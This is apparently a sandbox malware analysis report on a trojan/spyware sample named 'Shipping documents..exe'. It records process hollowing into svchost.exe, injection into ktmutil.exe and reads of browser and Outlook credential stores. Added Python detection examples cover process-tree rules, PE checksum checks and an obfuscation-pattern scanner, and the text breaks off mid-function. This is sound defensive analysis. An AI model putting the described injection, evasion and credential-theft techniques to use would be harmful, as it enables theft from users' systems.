                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341FFB16_2_0341FFB1
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03369EB06_2_03369EB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03411D5A6_2_03411D5A
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03417D736_2_03417D73
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03363D406_2_03363D40
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0337FDC06_2_0337FDC0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033D9C326_2_033D9C32
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341FCF26_2_0341FCF2
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02991FB06_2_02991FB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0298CEF06_2_0298CEF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0298CEE76_2_0298CEE7
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0298B1906_2_0298B190
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0298B1886_2_0298B188
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0298D1106_2_0298D110
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_029956106_2_02995610
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_029ABBC06_2_029ABBC0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_029938506_2_02993850
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_031CE3446_2_031CE344
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_031CE4636_2_031CE463
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_031CCA9B6_2_031CCA9B
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_031CE8056_2_031CE805
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_031CD8C86_2_031CD8C8
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 033CEA12 appears 86 times
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 03395130 appears 58 times
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 033DF290 appears 106 times
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 0334B970 appears 280 times
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 033A7E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03787E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037AEA12 appears 86 times
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: String function: 004115D7 appears 36 times
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: String function: 00416C70 appears 39 times
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: String function: 00445AE0 appears 65 times
                Source: Shipping documents..exe, 00000000.00000003.2120440183.00000000048CD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Shipping documents..exe
                Source: Shipping documents..exe, 00000000.00000003.2119035605.0000000004723000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Shipping documents..exe
                Source: Shipping documents..exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/2@15/12
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: 0_2_0044AF6C GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
                Source: C:\Users\user\Desktop\Shipping documents..exe | File created: C:\Users\user\AppData\Local\Temp\bothsidedness
                Source: C:\Users\user\Desktop\Shipping documents..exe | Command line argument: #v | 0_2_0040D6B0
                Source: Shipping documents..exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Shipping documents..exe | File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\Shipping documents..exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: ktmutil.exe, 00000006.00000002.4559793375.0000000002E71000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2630854960.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2631010094.0000000002E43000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4559793375.0000000002E43000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4559793375.0000000002E4C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Shipping documents..exe | ReversingLabs: Detection: 42%
                Source: C:\Users\user\Desktop\Shipping documents..exe | File read: C:\Users\user\Desktop\Shipping documents..exe
                Source: unknown | Process created: C:\Users\user\Desktop\Shipping documents..exe "C:\Users\user\Desktop\Shipping documents..exe"
                Source: C:\Users\user\Desktop\Shipping documents..exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping documents..exe"
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
                Source: C:\Windows\SysWOW64\ktmutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
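The process tree above is the behavioural signal a detection engineer keys on: a Desktop executable starts C:\Windows\SysWOW64\svchost.exe but hands it its own command line (the classic trace of process hollowing, where a suspended system binary has its image replaced), a randomly named binary under Program Files (x86) starts the SysWOW64 utilities srdelayed.exe and ktmutil.exe, and ktmutil.exe then starts Firefox on its way to the browser credential store. The Python below is an added example and is not part of the Joe Sandbox report: it encodes the report's five process-creation entries as constructed tuples and applies three parent/child rules to them. The rule names and the allowlist of Windows-directory processes that may legitimately start a browser are assumptions to be tuned per environment.

```python
import ntpath

# Process-creation events taken from the report's process tree, as
# (parent image, child image, child command line). "unknown" is the
# report's placeholder for the analysis harness that started the sample.
SAMPLE = "C:\\Users\\user\\Desktop\\Shipping documents..exe"
DROPPER = ("C:\\Program Files (x86)\\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn"
           "\\FuFneNIzDsF.exe")
REPORT_EVENTS = [
    ("unknown", SAMPLE, f'"{SAMPLE}"'),
    (SAMPLE, "C:\\Windows\\SysWOW64\\svchost.exe", f'"{SAMPLE}"'),
    (DROPPER, "C:\\Windows\\SysWOW64\\srdelayed.exe", '"C:\\Windows\\SysWOW64\\srdelayed.exe"'),
    (DROPPER, "C:\\Windows\\SysWOW64\\ktmutil.exe", '"C:\\Windows\\SysWOW64\\ktmutil.exe"'),
    ("C:\\Windows\\SysWOW64\\ktmutil.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     '"C:\\Program Files\\Mozilla Firefox\\Firefox.exe"'),
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# Assumed allowlist: Windows-directory processes that normally launch a browser.
BROWSER_LAUNCHERS = {"explorer.exe", "cmd.exe", "powershell.exe"}

RULE_MISMATCH = "image/command-line mismatch"
RULE_SYSUTIL = "system utility launched from non-Windows parent"
RULE_BROWSER = "browser launched by system utility"


def basename(path):
    # ntpath handles backslash paths on every platform
    return ntpath.basename(path).lower()


def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def image_from_cmdline(cmdline):
    """Return the executable a command line names (quoted, or the first token)."""
    s = cmdline.strip()
    if s.startswith('"'):
        return s[1:s.index('"', 1)]
    return s.split(" ", 1)[0]


def analyze(events):
    """Apply the three parent/child rules; returns (rule, parent, image, cmdline) tuples."""
    findings = []
    for parent, image, cmdline in events:
        child = basename(image)
        claimed = basename(image_from_cmdline(cmdline))
        # Hollowing/replacement: the process image and its command line disagree
        if claimed != child:
            findings.append((RULE_MISMATCH, parent, image, cmdline))
        # A System32/SysWOW64 binary started by something outside C:\Windows
        if in_system_dir(image) and parent != "unknown" \
                and not parent.lower().startswith("c:\\windows\\"):
            findings.append((RULE_SYSUTIL, parent, image, cmdline))
        # A browser started by a Windows utility that is not a normal launcher
        if child in BROWSERS and in_system_dir(parent) \
                and basename(parent) not in BROWSER_LAUNCHERS:
            findings.append((RULE_BROWSER, parent, image, cmdline))
    return findings


def rule_counts(events):
    counts = {}
    for rule, *_ in analyze(events):
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    for rule, parent, image, cmdline in analyze(REPORT_EVENTS):
        print(f"[{rule}] {parent} -> {image}  {cmdline}")
```

On the report's own tree the mismatch rule fires once (svchost.exe carrying the Shipping documents..exe command line), the system-utility rule three times (svchost.exe, srdelayed.exe, ktmutil.exe) and the browser rule once (ktmutil.exe starting Firefox). The same three fields exist in Sysmon Event ID 1 (ParentImage, Image, CommandLine), so analyze() can be fed live telemetry unchanged.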
                Source: C:\Users\user\Desktop\Shipping documents..exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Shipping documents..exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\Shipping documents..exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\Shipping documents..exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\Shipping documents..exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\Shipping documents..exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\Shipping documents..exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Shipping documents..exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Shipping documents..exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Shipping documents..exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Shipping documents..exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: ktmw32.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\Shipping documents..exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Windows\SysWOW64\ktmutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Shipping documents..exe | Static file information: File size 1322107 > 1048576
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FuFneNIzDsF.exe, 00000004.00000002.4559487578.00000000003CE000.00000002.00000001.01000000.00000005.sdmp, FuFneNIzDsF.exe, 00000008.00000000.2507028325.00000000003CE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Shipping documents..exe, 00000000.00000003.2122204716.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Shipping documents..exe, 00000000.00000003.2116752681.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433300541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339806814.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433300541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337559785.0000000003300000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569169895.00000000034BE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569169895.0000000003320000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2443745959.0000000003178000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2441691233.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdbGCTL source: FuFneNIzDsF.exe, 00000004.00000003.2377105462.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Shipping documents..exe, 00000000.00000003.2122204716.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Shipping documents..exe, 00000000.00000003.2116752681.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2433300541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339806814.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433300541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337559785.0000000003300000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000006.00000002.4569169895.00000000034BE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569169895.0000000003320000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2443745959.0000000003178000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2441691233.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000002.00000002.2433159494.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433135384.0000000003000000.00000004.00000020.00020000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000003.2377390282.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdb source: svchost.exe, 00000002.00000002.2433159494.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433135384.0000000003000000.00000004.00000020.00020000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000003.2377390282.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdb source: FuFneNIzDsF.exe, 00000004.00000003.2377105462.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569488926.000000000394C000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.000000001566C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569488926.000000000394C000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.000000001566C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress
                Source: Shipping documents..exe | Static PE information: real checksum: 0xa961f should be: 0x14c9b5
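The checksum finding is a static clue that the file on disk is not the image the linker emitted: the CheckSum stored in the optional header no longer matches the value computed over the file, which is what happens when a binary is packed or patched after linking. The following Python is an added example, not code from the report or from Joe Sandbox. It recomputes the header checksum with the documented algorithm (the one imagehlp's CheckSumMappedFile implements) and classifies a file; the helper that builds a minimal PE image is constructed here purely for demonstration. The "unset" case is kept separate because unsigned builds commonly ship a zero checksum without any tampering, so only a non-zero, non-matching value is worth reporting.

```python
import struct


def _checksum_field_offset(data):
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # CheckSum is 64 bytes into the optional header, which follows the
    # 4-byte "PE\0\0" signature and the 20-byte COFF file header.
    return e_lfanew + 4 + 20 + 64


def pe_checksum(data):
    """Recompute the PE header CheckSum: a 32-bit wraparound sum of every dword
    except the CheckSum field itself, folded to 16 bits, plus the file length."""
    skip = _checksum_field_offset(data) & ~3
    full = len(data) - len(data) % 4
    total = 0
    for off in range(0, full, 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", data, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)   # fold the carry back in
    if len(data) % 4:                                   # zero-pad a trailing partial dword
        tail = data[full:] + b"\x00" * (4 - len(data) % 4)
        total += struct.unpack_from("<I", tail, 0)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    total &= 0xFFFF
    return (total + len(data)) & 0xFFFFFFFF


def stored_checksum(data):
    return struct.unpack_from("<I", data, _checksum_field_offset(data))[0]


def verify_checksum(data):
    """'unset' (field is zero; common for unsigned builds and not evidence of
    tampering), 'ok', or 'mismatch' (modified after linking, e.g. packed/patched)."""
    stored = stored_checksum(data)
    if stored == 0:
        return "unset"
    return "ok" if stored == pe_checksum(data) else "mismatch"


def build_minimal_pe(checksum=0, size=256):
    """Constructed test image: MZ stub, e_lfanew=0x40, PE signature and a CheckSum
    field; everything else zero. Enough for the checksum code, not a loadable PE."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\x00\x00"
    struct.pack_into("<I", buf, 0x40 + 4 + 20 + 64, checksum)
    return bytes(buf)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe()
    print(f"stored=0x{stored_checksum(data):x} computed=0x{pe_checksum(data):x} "
          f"-> {verify_checksum(data)}")
```

Run it against the sample (python pe_checksum.py "Shipping documents..exe") to reproduce the report's stored/computed pair; a "mismatch" verdict on its own only says the file was altered after linking, so it should be read together with the packer and injection findings rather than as a standalone verdict.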
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: 0_2_00462463 push edi; ret 0_2_00462465
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: 0_2_00448A0E push esi; ret 0_2_00448A10
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416096 push eax; ret 2_2_004160E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004168B9 push 49A0F8CEh; ret 2_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004160BB push eax; ret 2_2_004160E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416970 push 49A0F8CEh; ret 2_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041692F push 49A0F8CEh; ret 2_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004049B6 push cs; iretd 2_2_004049BA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004032E0 push eax; ret 2_2_004032E2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00415A90 push ds; retf 2_2_00415A93
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041938B push ecx; retf 2_2_004193EC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411BB6 push ecx; retf 2_2_00411BB8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004065E5 push cs; ret 2_2_004065F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00404E33 push ds; iretd 2_2_00404E63
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D6C1 push ebp; retf 2_2_0040D6CA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00404E91 push ds; iretd 2_2_00404E63
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370225F pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037027FA pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx 2_2_037309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370283D push eax; iretd 2_2_03702858
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Code function: 4_2_05305D59 push ecx; ret 4_2_05305D97
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Code function: 4_2_053145B0 push eax; ret 4_2_053145DE
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Code function: 4_2_05314DAE push 49A0F8CEh; ret 4_2_05314E07
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Code function: 4_2_0531458B push eax; ret 4_2_053145DE
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Code function: 4_2_05305DE5 push ecx; ret 4_2_05305D97
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Code function: 4_2_05305CDD push ecx; ret 4_2_05305D97
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Code function: 4_2_05313F85 push ds; retf 4_2_05313F88
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Code function: 4_2_05314E24 push 49A0F8CEh; ret 4_2_05314E07
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Code function: 4_2_05314E65 push 49A0F8CEh; ret 4_2_05314E07
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe | Code function: 4_2_05302EAB push cs; iretd 4_2_05302EAF
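A push 49A0F8CEh; ret sequence is a disguised jmp: the immediate is pushed as a fake return address and ret transfers control to it, which breaks linear-sweep disassembly and call/ret stack tracing (the same trick the "push reg; ret" and "pushad; ret" entries above use with a computed target). The rdtsc hit reported later in the evasion section is the usual timing primitive for debugger and sandbox detection. The Python below is an added example and is not part of the report: it scans a code blob for these encodings and decodes the branch target of the immediate form. The byte string is constructed for the demonstration, reusing the report's own immediate. Because it matches raw bytes without decoding instruction boundaries, it can also match inside operands of other instructions, so treat its output as triage leads to confirm in a disassembler, not as proof.

```python
import re

# Encodings of the sequences the report flags. DOTALL lets "." match any byte.
PATTERNS = [
    ("push imm32; ret", re.compile(rb"\x68(?P<imm>.{4})\xc3", re.DOTALL)),
    ("push reg; ret",   re.compile(rb"(?P<reg>[\x50-\x57])\xc3", re.DOTALL)),
    ("pushad; ret",     re.compile(rb"\x60\xc3")),
    ("rdtsc",           re.compile(rb"\x0f\x31")),
]
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]  # 0x50..0x57 push encodings


def scan(code, base=0):
    """Return sorted (address, description, branch target or None) for every hit."""
    hits = []
    for name, pat in PATTERNS:
        for m in pat.finditer(code):
            target = None
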